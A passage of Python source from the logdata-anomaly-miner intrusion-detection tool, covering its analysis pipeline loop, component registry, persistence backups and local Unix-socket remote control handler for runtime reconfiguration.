{str(wl_exception)}\n" elif event_type == 'Analysis.AllowlistViolationDetector': result_string += f"FAIL {event_id}: No automatic modification of allowlist rules, manual changes required\n" allowlisted_flag = True elif event_type == 'ParserModel.UnparsedData': result_string += f"FAIL {event_id}: No automatic modification of parsers yet\n" else: result_string += f"FAIL {event_id}: Unsupported event type {event_type}\n" if allowlisted_flag: # Clear the allowlisted event. history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:] else: event_pos += 1 if lookup_count == 0: result_string = 'FAIL: Not a single event ID from specification found' self.REMOTE_CONTROL_RESPONSE = result_string def reopen_event_handler_streams(self, analysis_context): """Reopen all StreamPrinterEventHandler streams for log rotation.""" analysis_context.close_event_handler_streams(analysis_context.atomizer_factory.event_handler_list, reopen=True) msg = "Reopened all StreamPrinterEventHandler streams." self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def _repr_recursive(attr): """Return a valid JSON representation of an config attribute with the types list, dict, set or tuple. @param attr the attribute to be represented. """ if attr is None: return None if isinstance(attr, (bool, type(AminerConfig))): rep = str(attr) elif isinstance(attr, (int, str, float)): rep = attr elif isinstance(attr, bytes): rep = attr.decode() elif isinstance(attr, (list, tuple, set)): if isinstance(attr, (tuple, set)): attr = list(attr) for i, a in enumerate(attr): attr[i] = _repr_recursive(a) rep = str(attr).replace('\\"', "'").replace("'[", "[").replace("]'", "]").replace("'", '"').replace('"False"', 'false').replace( '"True"', 'true').replace('"None"', 'null') elif isinstance(attr, dict): new_attr = {} for key in attr.keys(): value = _repr_recursive(key) if isinstance(value, str): value = value.replace('\\"', "'") new_attr[str(key)] = value rep = str(new_attr).replace("'[", "[").replace("]'", "]") else: rep = attr.__class__.__name__ return rep def _reformat_attr(attr): """Return a valid JSON representation of an config attribute with any type. If the type is list, dict, set or tuple _repr_recursive is called. @param attr the attribute to be represented. """ if type(attr) in (int, str, float, bool, type(AminerConfig), type(None)): rep = str(attr) elif isinstance(attr, bytes): rep = attr.decode() elif isinstance(attr, (list, dict, set, tuple)): rep = _repr_recursive(attr) else: rep = attr.__class__.__name__ if rep.startswith("'") and rep.endswith("'") and rep.count("'") == 2: rep = rep.replace("'", '"') elif rep.strip('"').startswith("'") and rep.strip('"').endswith("'") and rep.strip('"').count("'") == 2: rep = rep.strip('"').replace("'", '"') else: rep = rep.strip('"').replace("'", '\\"') if not isinstance(attr, (list, dict, tuple, set)) and not rep.startswith('"') and not rep.isdecimal(): try: float(rep) except ValueError: rep = f'"{rep}"' return rep logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/AnalysisChild.py000066400000000000000000001346731500476301700323220ustar00rootroot00000000000000"""This module contains classes for execution of py child process main analysis loop. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import base64 import errno import fcntl import json import os import select import socket import struct import sys import time import traceback import resource import logging from datetime import datetime import shutil from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_STAT_PERIOD, \ DEFAULT_STAT_PERIOD, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, REMOTE_CONTROL_LOG_NAME, KEY_PERSISTENCE_PERIOD, \ DEFAULT_PERSISTENCE_PERIOD from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.ZmqEventHandler import ZmqEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogStream import LogStream from aminer.util import PersistenceUtil from aminer.util import SecureOSFunctions from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import JsonUtil from aminer.AminerRemoteControlExecutionMethods import AminerRemoteControlExecutionMethods class AnalysisContext: """This class collects information about the current analysis context to access it during analysis or remote management.""" TIME_TRIGGER_CLASS_REALTIME = 1 TIME_TRIGGER_CLASS_ANALYSISTIME = 2 def __init__(self, aminer_config): self.aminer_config = aminer_config # This is the factory to create atomizers for incoming data streams and link them to the analysis pipeline. self.atomizer_factory = None # This is the current log processing and analysis time regarding the data stream being analyzed. While None, the analysis time # e.g. used to trigger components (see analysisTimeTriggeredComponents), is the same as current system time. For forensic analysis # this time has to be updated to values derived from the log data input to reflect the current log processing time, which will be in # the past and may progress much faster than real system time. self.analysis_time = None # Keep a registry of all analysis and filter configuration for later use. Remote control interface may then access them for # runtime reconfiguration. self.next_registry_id = 0 self.registered_components = {} # Keep also a list of components by name. self.registered_components_by_name = {} # Keep lists of components that should receive timer interrupts when real time or analysis time has elapsed. self.real_time_triggered_components = [] self.analysis_time_triggered_components = [] self.suppress_detector_list = [] def add_time_triggered_component(self, component, trigger_class=None): """Add a time-triggered component to the registry.""" if not isinstance(component, TimeTriggeredComponentInterface): msg = f"Attempting to register component of class {component.__class__.__name__} not implementing " \ f"aminer.util.TimeTriggeredComponentInterface" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if trigger_class is None: trigger_class = component.get_time_trigger_class() if trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_REALTIME: self.real_time_triggered_components.append(component) elif trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME: self.analysis_time_triggered_components.append(component) else: msg = f"Attempting to timer component for unknown class {trigger_class}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) logging.getLogger(DEBUG_LOG_NAME).debug( 'Called %s for the component %s', 'add_time_triggered_component', component.__class__.__name__) def register_component(self, component, component_name=None, register_time_trigger_class_override=None): """Register a new component. A component implementing the TimeTriggeredComponentInterface will also be added to the appropriate lists unless. registerTimeTriggerClassOverride is specified. @param component the component to be registered. @param component_name an optional name assigned to the component when registering. When no name is specified, the detector class name plus an identifier will be used. When a component with the same name was already registered, this will cause an error. @param register_time_trigger_class_override if not none, ignore the time trigger class supplied by the component and register it for the classes specified in the override list. Use an empty list to disable registration. """ if component_name is None: component_name = str(component.__class__.__name__) + str(self.next_registry_id) if component_name in self.registered_components_by_name: msg = 'Component with same name already registered' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if register_time_trigger_class_override is not None and not isinstance(component, TimeTriggeredComponentInterface): msg = 'Requesting override on component not implementing TimeTriggeredComponentInterface' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.registered_components[self.next_registry_id] = (component, component_name) self.next_registry_id += 1 self.registered_components_by_name[component_name] = component if isinstance(component, TimeTriggeredComponentInterface): if register_time_trigger_class_override is None: self.add_time_triggered_component(component) else: for trigger_class in register_time_trigger_class_override: self.add_time_triggered_component(component, trigger_class) logging.getLogger(DEBUG_LOG_NAME).debug( "Registered component %s with the id %d and component_name '%s'.", component.__class__.__name__, self.next_registry_id - 1, component_name) def get_registered_component_ids(self): """Get a list of currently known component IDs.""" return self.registered_components.keys() def get_component_by_id(self, id_string): """Get a component by ID. @return None if not found. """ component_info = self.registered_components.get(id_string) if component_info is None: return None return component_info[0] def get_registered_component_names(self): """Get a list of currently known component names.""" return list(self.registered_components_by_name.keys()) def get_component_by_name(self, name): """Get a component by name. @return None if not found. """ return self.registered_components_by_name.get(name) def get_name_by_component(self, component): """Get the name of a component. @return None if not found. """ for component_name, component_iter in self.registered_components_by_name.items(): if component_iter == component: return component_name return None def get_id_by_component(self, component): """Get the name of a component. @return None if not found. """ for component_id, component_iter in self.registered_components.items(): if component_iter[0] == component: return component_id return None def build_analysis_pipeline(self): """Create the pipeline.""" logging.getLogger(DEBUG_LOG_NAME).debug("Started with build_analysis_pipeline.") self.aminer_config.build_analysis_pipeline(self) def close_event_handler_streams(self, event_handlers, reopen=False): """Close the streams of all StreamPrinterEventHandlers.""" for event_handler in event_handlers: if isinstance(event_handler, StreamPrinterEventHandler): # Can not rotate sys.stdout. Consider using the copytruncate option of logrotate instead. if event_handler.stream.name in ("", ""): continue try: event_handler.stream.close() if reopen: event_handler.stream = open(event_handler.stream.name, "w+") except IOError as e: msg = f"Error when closing or opening stream with the name {event_handler.stream.name}, shutting down.\n{e}" logging.getLogger(DEBUG_LOG_NAME).critical(msg) print(msg, file=sys.stderr) sys.exit(1) elif isinstance(event_handler, ZmqEventHandler): # Can not rotate sys.stdout. Consider using the copytruncate option of logrotate instead. if event_handler.producer is not None: try: event_handler.producer.close() event_handler.producer = None except IOError as e: msg = f"Error when closing or opening stream with the name {event_handler.stream.name}, shutting down.\n{e}" logging.getLogger(DEBUG_LOG_NAME).critical(msg) print(msg, file=sys.stderr) sys.exit(1) elif isinstance(event_handler, JsonConverterHandler): self.close_event_handler_streams(event_handler.json_event_handlers) suspended_flag = False class AnalysisChild(TimeTriggeredComponentInterface): """This class defines the child performing the complete analysis workflow. When splitting privileges between analysis and monitor process, this class should only be initialized within the analysis process! """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME offline_mode = False def __init__(self, program_name, aminer_config): self.program_name = program_name self.aminer_config = aminer_config self.analysis_context = AnalysisContext(aminer_config) self.run_analysis_loop_flag = True self.log_streams_by_name = {} self.persistence_file_name = build_persistence_file_name( self.analysis_context.aminer_config, self.__class__.__name__ + '/RepositioningData') self.next_persist_time = time.time() + self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.repositioning_data_dict = {} self.master_control_socket = None self.remote_control_socket = None # This dictionary provides a lookup list from file descriptor to associated object for handling the data to and from the given # descriptor. Currently supported handler objects are: # * Parent process socket # * Remote control listening socket # * LogStreams # * Remote control connections self.tracked_fds_dict = {} # Override the signal handler to allow graceful shutdown. def graceful_shutdown_handler(_signo, _stack_frame): """React on typical shutdown signals.""" msg = f"{program_name}: caught signal, shutting down" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).info(msg) self.run_analysis_loop_flag = False import signal signal.signal(signal.SIGHUP, graceful_shutdown_handler) signal.signal(signal.SIGINT, graceful_shutdown_handler) signal.signal(signal.SIGTERM, graceful_shutdown_handler) # Do this on at the end of the initialization to avoid having partially initialized objects inside the registry. self.analysis_context.add_time_triggered_component(self) def run_analysis(self, master_fd): """Run the analysis thread. @param master_fd the main communication socket to the parent to receive logfile updates from the parent. @return 0 on success, e.g. normal termination via signal or 1 on error. """ # The masterControlSocket is the socket to communicate with the master process to receive commands or logstream data. Expect # the parent/child communication socket on fd 3. This also duplicates the fd, so close the old one. self.master_control_socket = socket.fromfd(master_fd, socket.AF_UNIX, socket.SOCK_DGRAM, 0) os.close(master_fd) self.tracked_fds_dict[self.master_control_socket.fileno()] = self.master_control_socket # Locate the real analysis configuration. self.analysis_context.build_analysis_pipeline() if self.analysis_context.atomizer_factory is None: msg = 'build_analysis_pipeline() did not initialize atomizer_factory, terminating' print('FATAL: ' + msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).critical(msg) return 1 real_time_triggered_components = self.analysis_context.real_time_triggered_components analysis_time_triggered_components = self.analysis_context.analysis_time_triggered_components max_memory_mb = self.analysis_context.aminer_config.config_properties.get(KEY_RESOURCES_MAX_MEMORY_USAGE, None) if max_memory_mb is not None: try: max_memory_mb = int(max_memory_mb) resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY)) logging.getLogger(DEBUG_LOG_NAME).debug('set max memory limit to %d MB.', max_memory_mb) except ValueError: msg = f"{KEY_RESOURCES_MAX_MEMORY_USAGE} must be an integer, terminating" print('FATAL: ' + msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).critical(msg) return 1 # Load continuation data for last known log streams. The loaded data has to be a dictionary with repositioning information for # each stream. The data is used only when creating the first stream with that name. self.repositioning_data_dict = PersistenceUtil.load_json(self.persistence_file_name) if self.repositioning_data_dict is None: self.repositioning_data_dict = {} # A list of LogStreams where handleStream() blocked due to downstream not being able to consume the data yet. blocked_log_streams = [] # Always start when number is None. next_real_time_trigger_time = None next_analysis_time_trigger_time = None next_backup_time_trigger_time = None log_stat_period = self.analysis_context.aminer_config.config_properties.get(KEY_LOG_STAT_PERIOD, DEFAULT_STAT_PERIOD) next_statistics_log_time = time.time() + log_stat_period delayed_return_status = 0 while self.run_analysis_loop_flag: # Build the list of inputs to select for anew each time: the LogStream file descriptors may change due to rollover. input_select_fd_list = [] output_select_fd_list = [] for fd_handler_object in self.tracked_fds_dict.values(): if isinstance(fd_handler_object, LogStream): stream_fd = fd_handler_object.get_current_fd() if stream_fd < 0: continue input_select_fd_list.append(stream_fd) elif isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): fd_handler_object.add_select_fds(input_select_fd_list, output_select_fd_list) else: # This has to be a socket, just add the file descriptor. input_select_fd_list.append(fd_handler_object.fileno()) # Loop over the list in reverse order to avoid skipping elements in remove. if not suspended_flag: for log_stream in reversed(blocked_log_streams): current_stream_fd = log_stream.handle_stream() if current_stream_fd >= 0: self.tracked_fds_dict[current_stream_fd] = log_stream input_select_fd_list.append(current_stream_fd) blocked_log_streams.remove(log_stream) read_list = None write_list = None try: (read_list, write_list, _except_list) = select.select(input_select_fd_list, output_select_fd_list, [], 1) except select.error as select_error: # Interrupting signals, e.g. for shutdown are OK. if select_error[0] == errno.EINTR: continue msg = f"Unexpected select result {str(select_error)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) delayed_return_status = 1 break for read_fd in read_list: fd_handler_object = self.tracked_fds_dict[read_fd] if isinstance(fd_handler_object, LogStream): # Handle this LogStream. Only when downstream processing blocks, add the stream to the blocked stream list. handle_result = fd_handler_object.handle_stream() if handle_result < 0: # No need to care if current internal file descriptor in LogStream has changed in handleStream(), # this will be handled when unblocking. del self.tracked_fds_dict[read_fd] blocked_log_streams.append(fd_handler_object) elif handle_result != read_fd: # The current fd has changed, update the tracking list. del self.tracked_fds_dict[read_fd] self.tracked_fds_dict[handle_result] = fd_handler_object continue if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): try: fd_handler_object.do_receive() except ConnectionError as receiveException: msg = f"Unclean termination of remote control: {str(receiveException)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) print(msg, file=sys.stderr) if fd_handler_object.is_dead(): logging.getLogger(DEBUG_LOG_NAME).debug('Deleting fd %s from tracked_fds_dict.', str(read_fd)) del self.tracked_fds_dict[read_fd] # Reading is only attempted when output buffer was already flushed. Try processing the next request to fill the output # buffer for next round. else: fd_handler_object.do_process(self.analysis_context) continue if fd_handler_object == self.master_control_socket: self.handle_master_control_socket_receive() continue if fd_handler_object == self.remote_control_socket: # We received a remote connection, accept it unconditionally. Users should make sure, that they do not exhaust # resources by hogging open connections. (control_client_socket, _remote_address) = self.remote_control_socket.accept() # Keep track of information received via this remote control socket. remote_control_handler = AnalysisChildRemoteControlHandler(control_client_socket) self.tracked_fds_dict[control_client_socket.fileno()] = remote_control_handler continue msg = f"Unhandled object type {type(fd_handler_object)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) for write_fd in write_list: fd_handler_object = self.tracked_fds_dict[write_fd] if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): buffer_flushed_flag = False try: buffer_flushed_flag = fd_handler_object.do_send() except OSError as sendError: msg = f"Error at sending data via remote control: {str(sendError)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) try: fd_handler_object.terminate() except ConnectionError as terminateException: msg = f"Unclean termination of remote control: {str(terminateException)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) if buffer_flushed_flag: fd_handler_object.do_process(self.analysis_context) if fd_handler_object.is_dead(): del self.tracked_fds_dict[write_fd] continue msg = f"Unhandled object type {type(fd_handler_object)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Handle the real time events. real_time = time.time() if next_real_time_trigger_time is None or real_time >= next_real_time_trigger_time: next_trigger_offset = 3600 for component in real_time_triggered_components: if not suspended_flag: next_trigger_request = component.do_timer(real_time) next_trigger_offset = min(next_trigger_offset, next_trigger_request) next_real_time_trigger_time = real_time + next_trigger_offset if real_time >= next_statistics_log_time: next_statistics_log_time = real_time + log_stat_period logging.getLogger(DEBUG_LOG_NAME).debug('Statistics logs are written..') # log the statistics for every component. for component_name in self.analysis_context.registered_components_by_name: component = self.analysis_context.registered_components_by_name[component_name] component.log_statistics(component_name) # Handle the analysis time events. The analysis time will be different when an analysis time component is registered. analysis_time = self.analysis_context.analysis_time if analysis_time is None: analysis_time = real_time if next_analysis_time_trigger_time is None or analysis_time >= next_analysis_time_trigger_time: next_trigger_offset = 3600 for component in analysis_time_triggered_components: if not suspended_flag: next_trigger_request = component.do_timer(real_time) next_trigger_offset = min(next_trigger_offset, next_trigger_request) next_analysis_time_trigger_time = analysis_time + next_trigger_offset # backup the persistence data. backup_time = time.time() backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S') persistence_dir = self.analysis_context.aminer_config.config_properties.get( KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) persistence_dir = persistence_dir.rstrip('/') backup_path = persistence_dir + '/backup/' backup_path_with_date = os.path.join(backup_path, backup_time_str) if next_backup_time_trigger_time is None or backup_time >= next_backup_time_trigger_time: next_trigger_offset = 3600 * 24 if next_backup_time_trigger_time is not None: shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*')) logging.getLogger(DEBUG_LOG_NAME).info('Persistence backup created in %s.', backup_path_with_date) next_backup_time_trigger_time = backup_time + next_trigger_offset if len(self.tracked_fds_dict) == 1 and self.offline_mode: self.run_analysis_loop_flag = False # Analysis loop is only left on shutdown. Try to persist everything and leave. PersistenceUtil.persist_all() for sock in self.tracked_fds_dict.values(): sock.close() self.analysis_context.close_event_handler_streams(self.analysis_context.atomizer_factory.event_handler_list) return delayed_return_status def handle_master_control_socket_receive(self): """Receive information from the parent process via the master control socket. This method may only be invoked when receiving is guaranteed to be nonblocking and to return data. """ # We cannot fail with None here as the socket was in the readList. (received_fd, received_type_info, annotation_data) = SecureOSFunctions.receive_annotated_file_descriptor(self.master_control_socket) if received_type_info == b'logstream': repositioning_data = self.repositioning_data_dict.get(annotation_data, None) if repositioning_data is not None: del self.repositioning_data_dict[annotation_data] res = None if annotation_data.startswith(b'file://'): from aminer.input.LogStream import FileLogDataResource res = FileLogDataResource(annotation_data, received_fd, repositioning_data=repositioning_data) elif annotation_data.startswith(b'unix://'): from aminer.input.LogStream import UnixSocketLogDataResource res = UnixSocketLogDataResource(annotation_data, received_fd) else: msg = 'Filedescriptor of unknown type received' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Make fd nonblocking. fd_flags = fcntl.fcntl(res.get_file_descriptor(), fcntl.F_GETFL) fcntl.fcntl(res.get_file_descriptor(), fcntl.F_SETFL, fd_flags | os.O_NONBLOCK) log_stream = self.log_streams_by_name.get(res.get_resource_name()) if log_stream is None: stream_atomizer = self.analysis_context.atomizer_factory.get_atomizer_for_resource(res.get_resource_name()) log_stream = LogStream(res, stream_atomizer) self.tracked_fds_dict[res.get_file_descriptor()] = log_stream self.log_streams_by_name[res.get_resource_name()] = log_stream else: log_stream.add_next_resource(res) elif received_type_info == b'remotecontrol': if self.remote_control_socket is not None: msg = 'Received another remote control socket: multiple remote control not supported (yet?).' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.remote_control_socket = socket.fromfd(received_fd, socket.AF_UNIX, socket.SOCK_STREAM, 0) os.close(received_fd) self.tracked_fds_dict[self.remote_control_socket.fileno()] = self.remote_control_socket else: msg = f"Unhandled type info on received fd: {repr(received_type_info)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def do_timer(self, trigger_time): """Perform trigger actions and to determine the time for next invocation. The caller may decide to invoke this method earlier than requested during the previous call. Classes implementing this method have to handle such cases. Each class should try to limit the time spent in this method as it might delay trigger signals to other components. For extensive computational work or IO, a separate thread should be used. @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from real time timers or the forensic log timescale time value. @return the number of seconds when next invocation of this trigger is required. """ delta = self.next_persist_time - trigger_time if delta <= 0: self.repositioning_data_dict = {} for log_stream_name, log_stream in self.log_streams_by_name.items(): repositioning_data = log_stream.get_repositioning_data() if repositioning_data is not None: self.repositioning_data_dict[log_stream_name] = repositioning_data PersistenceUtil.store_json(self.persistence_file_name, self.repositioning_data_dict) delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta logging.getLogger(DEBUG_LOG_NAME).debug('Repositioning data was persisted.') return delta class AnalysisChildRemoteControlHandler: """This class stores information about one open remote control connection. The handler can be in 3 different states: * receive request: the control request was not completely received. The main process may use select() to wait for input data without blocking or polling. * execute: the request is complete and is currently under execution. In that mode all other aminer analysis activity is blocked. * respond: send back results from execution. All sent and received control packets have following common structure: * Total length in bytes (4 bytes): The maximal length is currently limited to 64k * Type code (4 bytes) * Data The handler processes following types: * Execute request ('EEEE'): Data is loaded as json artefact containing a list with two elements. The first one is the Python code to be executed. The second one is available within the execution namespace as 'remoteControlData'. The handler produces following requests: * Execution response ('RRRR'): The response contains a json artefact with a two element list. The first element is the content of 'remoteControlResponse' from the Python execution namespace. The second one is the exception message and traceback as string if an error has occured. Method naming: * do...(): Those methods perform an action consuming input or output buffer data. * may...(): Those methods return true if it would make sense to call a do...() method with the same name. * put...(): Those methods put a request on the buffers. """ max_control_packet_size = 1 << 32 def __init__(self, control_client_socket): self.control_client_socket = control_client_socket self.remote_control_fd = control_client_socket.fileno() self.input_buffer = b'' self.output_buffer = b'' def may_receive(self): """Check if this handler may receive more requests.""" return len(self.output_buffer) == 0 def do_process(self, analysis_context): """Process the next request, if any.""" request_data = self.do_get() if request_data is None: return request_type = request_data[4:8] if request_type == b'EEEE': json_remote_control_response = None exception_data = None try: json_request_data = (json.loads(request_data[8:].decode())) json_request_data = JsonUtil.decode_object(json_request_data) if (json_request_data is None) or (not isinstance(json_request_data, list)) or (len(json_request_data) != 2): msg = 'Invalid request data' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if json_request_data[0] and isinstance(json_request_data[0], bytes): json_request_data[0] = json_request_data[0].decode() if json_request_data[1]: if isinstance(json_request_data[1], list): new_list = [] for item in json_request_data[1]: if isinstance(item, bytes): new_list.append(item.decode()) else: new_list.append(item) json_request_data[1] = new_list else: json_request_data[1] = json_request_data[1].decode() methods = AminerRemoteControlExecutionMethods() from aminer.analysis import EnhancedNewMatchPathValueComboDetector, EventCorrelationDetector, EventTypeDetector, \ EventFrequencyDetector, EventSequenceDetector, HistogramAnalysis, MatchFilter, MatchValueAverageChangeDetector, \ MatchValueStreamWriter, MissingMatchPathValueDetector, NewMatchIdValueComboDetector, NewMatchPathDetector, \ NewMatchPathValueComboDetector, NewMatchPathValueDetector, ParserCount, Rules, TimeCorrelationDetector, \ TimeCorrelationViolationDetector, TimestampCorrectionFilters, TimestampsUnsortedDetector, VariableTypeDetector, \ AllowlistViolationDetector, EventCountClusterDetector exec_locals = { 'analysis_context': analysis_context, 'remote_control_data': json_request_data[1], 'print_current_config': methods.print_current_config, 'print_config_property': methods.print_config_property, 'print_attribute_of_registered_analysis_component': methods.print_attribute_of_registered_analysis_component, 'change_config_property': methods.change_config_property, 'change_attribute_of_registered_analysis_component': methods.change_attribute_of_registered_analysis_component, 'rename_registered_analysis_component': methods.rename_registered_analysis_component, 'add_handler_to_atom_filter_and_register_analysis_component': methods.add_handler_to_atom_filter_and_register_analysis_component, 'save_current_config': methods.save_current_config, 'allowlist_event_in_component': methods.allowlist_event_in_component, 'blocklist_event_in_component': methods.blocklist_event_in_component, 'print_persistence_event_in_component': methods.print_persistence_event_in_component, 'add_to_persistence_event_in_component': methods.add_to_persistence_event_in_component, 'remove_from_persistence_event_in_component': methods.remove_from_persistence_event_in_component, 'dump_events_from_history': methods.dump_events_from_history, 'ignore_events_from_history': methods.ignore_events_from_history, 'list_events_from_history': methods.list_events_from_history, 'allowlist_events_from_history': methods.allowlist_events_from_history, 'persist_all': methods.persist_all, 'list_backups': methods.list_backups, 'create_backup': methods.create_backup, 'reopen_event_handler_streams': methods.reopen_event_handler_streams, 'EnhancedNewMatchPathValueComboDetector': EnhancedNewMatchPathValueComboDetector.EnhancedNewMatchPathValueComboDetector, 'EventCorrelationDetector': EventCorrelationDetector.EventCorrelationDetector, 'EventCountClusterDetector': EventCountClusterDetector.EventCountClusterDetector, 'EventTypeDetector': EventTypeDetector.EventTypeDetector, 'EventFrequencyDetector': EventFrequencyDetector.EventFrequencyDetector, 'EventSequenceDetector': EventSequenceDetector.EventSequenceDetector, 'HistogramAnalysis': HistogramAnalysis.HistogramAnalysis, 'PathDependentHistogramAnalysis': HistogramAnalysis.PathDependentHistogramAnalysis, 'MatchFilter': MatchFilter.MatchFilter, 'MatchValueAverageChangeDetector': MatchValueAverageChangeDetector.MatchValueAverageChangeDetector, 'MatchValueStreamWriter': MatchValueStreamWriter.MatchValueStreamWriter, 'MissingMatchPathValueDetector': MissingMatchPathValueDetector.MissingMatchPathValueDetector, 'NewMatchIdValueComboDetector': NewMatchIdValueComboDetector.NewMatchIdValueComboDetector, 'NewMatchPathDetector': NewMatchPathDetector.NewMatchPathDetector, 'NewMatchPathValueComboDetector': NewMatchPathValueComboDetector.NewMatchPathValueComboDetector, 'NewMatchPathValueDetector': NewMatchPathValueDetector.NewMatchPathValueDetector, 'ParserCount': ParserCount.ParserCount, 'Rules': Rules, 'TimeCorrelationDetector': TimeCorrelationDetector.TimeCorrelationDetector, 'TimeCorrelationViolationDetector': TimeCorrelationViolationDetector.TimeCorrelationViolationDetector, 'SimpleMonotonicTimestampAdjust': TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust, 'TimestampsUnsortedDetector': TimestampsUnsortedDetector.TimestampsUnsortedDetector, 'VariableTypeDetector': VariableTypeDetector.VariableTypeDetector, 'AllowlistViolationDetector': AllowlistViolationDetector.AllowlistViolationDetector } logging.getLogger(REMOTE_CONTROL_LOG_NAME).log(15, json_request_data[0]) logging.getLogger(DEBUG_LOG_NAME).debug('Remote control: %s', json_request_data[0]) global suspended_flag if json_request_data[0] in ('suspend_aminer()', 'suspend_aminer', 'suspend'): suspended_flag = True msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is suspended now.' json_remote_control_response = json.dumps(msg) logging.getLogger(DEBUG_LOG_NAME).info(msg) elif json_request_data[0] in ('activate_aminer()', 'activate_aminer', 'activate'): suspended_flag = False msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is activated now.' json_remote_control_response = json.dumps(msg) logging.getLogger(DEBUG_LOG_NAME).info(msg) else: exec(json_request_data[0], {'__builtins__': None}, exec_locals) # nosec B102 json_remote_control_response = json.dumps(exec_locals.get('remoteControlResponse')) if methods.REMOTE_CONTROL_RESPONSE == '': methods.REMOTE_CONTROL_RESPONSE = None if exec_locals.get('remoteControlResponse') is None: json_remote_control_response = json.dumps(methods.REMOTE_CONTROL_RESPONSE) else: json_remote_control_response = json.dumps( exec_locals.get('remoteControlResponse') + methods.REMOTE_CONTROL_RESPONSE) except Exception: exception_data = traceback.format_exc() logging.getLogger(DEBUG_LOG_NAME).debug('Remote control exception data: %s', str(exception_data)) # This is little dirty but avoids having to pass over remoteControlResponse dumping again. if json_remote_control_response is None: json_remote_control_response = 'null' json_response = f"[{json.dumps(exception_data)}, {json_remote_control_response}]" if len(json_response) + 8 > self.max_control_packet_size: # Damn: the response would be larger than packet size. Fake a secondary exception and return part of the json string # included. Binary search of size could be more efficient, knowing the maximal size increase a string could have in json. max_include_size = len(json_response) min_include_size = 0 min_include_response_data = None while True: test_size = (max_include_size + min_include_size) >> 1 if test_size == min_include_size: break emergency_response_data = json.dumps( [f"Exception: Response too large\nPartial response data: {json_response[:test_size], None}..."]) if len(emergency_response_data) + 8 > self.max_control_packet_size: max_include_size = test_size - 1 else: min_include_size = test_size min_include_response_data = emergency_response_data json_response = min_include_response_data # Now size is OK, send the data json_response = json_response.encode() self.output_buffer += struct.pack("!I", len(json_response) + 8) + b'RRRR' + json_response else: msg = f"Invalid request type {repr(request_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def may_get(self): """Check if a call to do_get would make sense. @return True if the input buffer already contains a complete wellformed packet or definitely malformed one. """ if len(self.input_buffer) < 4: return False request_length = struct.unpack("!I", self.input_buffer[:4])[0] return (request_length <= len(self.input_buffer)) or (request_length >= self.max_control_packet_size) def do_get(self): """Get the next packet from the input buffer and remove it. @return the packet data including the length preamble or None when request not yet complete. """ if len(self.input_buffer) < 4: return None request_length = struct.unpack("!I", self.input_buffer[:4])[0] if (request_length < 0) or (request_length >= self.max_control_packet_size): msg = f"Invalid length value 0x{request_length} in malformed request starting with b64:" \ f"{base64.b64encode(self.input_buffer[:60])}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if request_length > len(self.input_buffer): return None request_data = self.input_buffer[:request_length] self.input_buffer = self.input_buffer[request_length:] return request_data def do_receive(self): """Receive data from the remote side and add it to the input buffer. This method call expects to read at least one byte of data. A zero byte read indicates EOF and will cause normal handler termination. when all input and output buffers are empty. Any other state or error causes handler termination before reporting the error. @return True if read was successful, false if EOF is reached without reading any data and all buffers are empty. @throws Exception when unexpected errors occured while receiving or shuting down the connection. """ data = os.read(self.remote_control_fd, 1 << 16) self.input_buffer += data if not data: 